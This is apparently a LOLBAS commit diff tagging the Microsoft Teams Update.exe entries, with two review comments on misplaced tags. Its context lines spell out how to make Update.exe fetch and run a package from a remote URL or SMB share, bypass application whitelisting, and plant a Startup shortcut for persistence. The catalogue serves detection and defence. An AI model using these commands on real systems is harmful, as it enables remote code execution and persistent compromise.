mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-30 16:54:00 +01:00
Update Update.yml Tags
Added Tags: Execute Nuget Execute Remote Execute EXE
This commit is contained in:
parent
ce9d4e59f5
commit
927189f01e
@ -18,6 +18,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --update=[url to package]
|
- Command: Update.exe --update=[url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -25,6 +28,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -32,6 +38,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
- Command: Update.exe --update=\\remoteserver\payloadFolder
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -39,6 +48,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --updateRollback=[url to package]
|
- Command: Update.exe --updateRollback=[url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -46,6 +58,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --updateRollback=[url to package]
|
- Command: Update.exe --updateRollback=[url to package]
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -53,6 +68,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||||
Usecase: Application Whitelisting Bypass
|
Usecase: Application Whitelisting Bypass
|
||||||
@ -60,6 +78,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
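Review bot: The `- Execute: Nuget` and `- Execute: Remote` tags added at the top of this hunk appear to attach to the `--processStart payload.exe` entry whose Command line closes the previous hunk, and that entry's Description says the payload is first copied into the local Teams `current` folder, so nothing is fetched from a remote location and no NuGet package is involved. The second `--processStart` entry (the hunk at -81,6) receives `- Execute: EXE` instead; suggest using `- Execute: EXE` here as well so both entries for the same command carry the same tag.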
@ -67,6 +88,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||||
Usecase: Download and execute binary
|
Usecase: Download and execute binary
|
||||||
@ -74,6 +98,9 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: Nuget
|
||||||
|
- Execute: Remote
|
||||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||||
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||||
Usecase: Execute binary
|
Usecase: Execute binary
|
||||||
@ -81,6 +108,8 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: EXE
|
||||||
- Command: Update.exe --createShortcut=payload.exe -l=Startup
|
- Command: Update.exe --createShortcut=payload.exe -l=Startup
|
||||||
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
|
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
|
||||||
Usecase: Execute binary
|
Usecase: Execute binary
|
||||||
@ -88,6 +117,8 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1547
|
MitreID: T1547
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: EXE
|
||||||
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
|
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
|
||||||
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
|
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
|
||||||
Usecase: Execute binary
|
Usecase: Execute binary
|
||||||
@ -95,6 +126,8 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1070
|
MitreID: T1070
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
Tags:
|
||||||
|
- Execute: EXE
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\update.exe'
|
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\update.exe'
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
|
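Review bot: `- Execute: EXE` in the Tags block added here lands on the `--removeShortcut=payload.exe -l=Startup` entry (MitreID T1070), whose Description only removes the Startup shortcut created earlier and runs no payload. An Execute tag will surface this entry to anyone filtering by execution capability; suggest dropping the Tags block from this entry, or documenting in the commit message why a cleanup command is tagged as execution.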